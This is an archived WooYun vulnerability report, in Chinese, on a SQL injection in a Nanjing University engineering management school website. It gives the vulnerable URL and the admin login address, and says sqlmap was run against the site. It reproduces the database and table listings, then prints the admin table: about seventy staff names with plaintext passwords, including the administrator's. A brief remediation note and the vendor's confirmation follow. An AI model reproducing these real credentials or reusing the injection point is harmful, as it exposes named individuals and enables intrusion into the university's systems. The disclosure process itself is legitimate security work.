乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-19: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-29: 细节向核心白帽子及相关领域专家公开 2015-06-08: 细节向普通白帽子公开 2015-06-18: 细节向实习白帽子公开 2015-07-03: 细节向公众公开
南京大学工程管理学院sql注入,泄露部分人员信息
注入点:
http://sme.nju.edu.cn/content/news_detail.php?id=89
直接用sqlmap跑一下,跑出服务器系统和权限
没想到权限这么多!跑下数据库和表名如下:
---[13:41:47] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.4.4, PHP 5.4.19back-end DBMS: MySQL 5.0.12[13:41:47] [INFO] fetching database names[13:41:47] [INFO] the SQL query used returns 9 entries[13:41:47] [INFO] resumed: information_schema[13:41:47] [INFO] resumed: cdcol[13:41:47] [INFO] resumed: mysql[13:41:47] [INFO] resumed: performance_schema[13:41:47] [INFO] resumed: phpmyadmin[13:41:47] [INFO] resumed: smee[13:41:47] [INFO] resumed: test[13:41:47] [INFO] resumed: webauth[13:41:48] [INFO] resumed: yuhonghai[13:41:48] [INFO] fetching tables for databases: 'cdcol, informatima, phpmyadmin, smee, test, webauth, yuhonghai'[13:41:48] [INFO] the SQL query used returns 154 entriesDatabase: cdcol[1 table]+----------------------------------------------+| cds |+----------------------------------------------+Database: phpmyadmin[12 tables]+----------------------------------------------+| pma_bookmark || pma_column_info || pma_designer_coords || pma_history || pma_pdf_pages || pma_recent || pma_relation || pma_table_coords || pma_table_info || pma_table_uiprefs || pma_tracking || pma_userconfig |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: smee[26 tables]+----------------------------------------------+| admin || t_basic_info || t_category || t_cbzz || t_ddsm || t_fblw || t_gllt || t_hjqk || t_hzjl || t_jrlt || t_jrlt_bak || t_jszz || t_jxkc || t_kyxm || t_kyxm_gj || t_kyxm_hxyb || t_kyxm_hxzd || t_kyxm_sbj || t_news || t_rych || t_shzw || t_xydt || t_yjfx || t_zlfm || t_zlyl || t_zwmjjt |+----------------------------------------------+Database: yuhonghai[32 tables]+----------------------------------------------+| user || admin || football || kejian || news || notice || report || t_basic_info || t_category || t_cbzz || t_ddsm || t_fblw || t_gllt || t_hjqk || t_hzjl || t_jrlt || t_jrlt_bak || t_jszz || t_jxkc || t_kyxm || t_kyxm_gj || t_kyxm_hxyb || t_kyxm_hxzd || t_kyxm_sbj || t_news || t_rych || t_shzw || t_xydt || t_yjfx || t_zlfm || t_zlyl || t_zwmjjt |+----------------------------------------------+Database: webauth[1 table]+----------------------------------------------+| user_pwd |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: test[1 table]+----------------------------------------------+| t_news |+----------------------------------------------+Database: information_schema[40 tables]+----------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------------------------+
查看一下信息,发现。。。
Database: smeeTable: admin[71 entries]+--------------------+-----------------+| user_name | user_pass |+--------------------+-----------------+| admin | novaadminnju520 || 陈春林 | 000000 || 陈国华 | 0 || 陈强 | 0 || 陈莹 | 0 || 程书萍 | 0 || 高俊 | 0 || 郭亚敏 | 0 || 黄奇 | 0 || 蒋军锋 | 0 || 焦小澄 | 0 || 宋跃江 | 0 || 许国良 | 0 || 瞿慧 | 358358 || 李民 | 0 || 李迁 | 0000 || 李心丹 | 83597503 || 刘海飞 | 0 || 刘慧敏 | 0 || 路元刚 | 83597544 || 王峰 | 83595506 || 王顺 | 0 || 肖斌卿 | 101932 || 肖条军 | 7371 || 徐薇 | 97123070 || 徐伟弘 | 0 || 杨佩 | 0 || 张兵 | 0 || 周晶 | 0 || 周跃进 | 406806 || 周运森 | 0 || 朱洪亮 | 0 || 朱华桂 | 726082 || 朱美琳 | 0 || 朱庆华 | 0 || 沈厚才 | 86205844 || 周献中 | 11xy69mx54zx || 盛昭瀚 | 0 || 李敬泉 | 0000 || 徐峰 | 000000 || 陈星光 | 0 || 李华雄 | 218000 || 朱张青 | 0 || 赵佳宝 | 0 || 杜建国 | 0 || 鲍晓毅 | 0 || 俞红海 | 789456123 || 李娟 | 0000 || 李维 | 0000 || 李密 | 0 || 刘烨 | 0 || 徐敏 | 0 || Hongjun Yan(炎宏军) | 0 || Jeff L.Hong(洪流) | 0 || 张旭苹 | 204001 || 毕军 | 0 || 方立兵 | fanglibing || 张益昕 | cityhunter || Liu Li | 111111 || Hans Jürgen Kracht | hjkracht || 陈彩华 | 000000 || 杨学伟 | a266456a || 唐迪明 | 83597501 || 朱海滨 | zhb63322 || 葛敏 | 0619 || 王博 | 0000 || 张莲民 | 0000 || 林良才 | 000000 || 徐红利 | hlxu46575719 || 李东昕 | lee820109 || 章嘉丽 | 000000 |+--------------------+-----------------+
泄露如此严重。。。最后在查看一下用户
这是后台地址:
http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php
我怎么搞,不过可以进的,但还是不要破坏教学系统最好吧。。就到这了!
过滤关键字,用安全狗拦截特殊字符!
危害等级:高
漏洞Rank:12
确认时间:2015-05-19 16:27
我们会通知相关院系进行处理。
暂无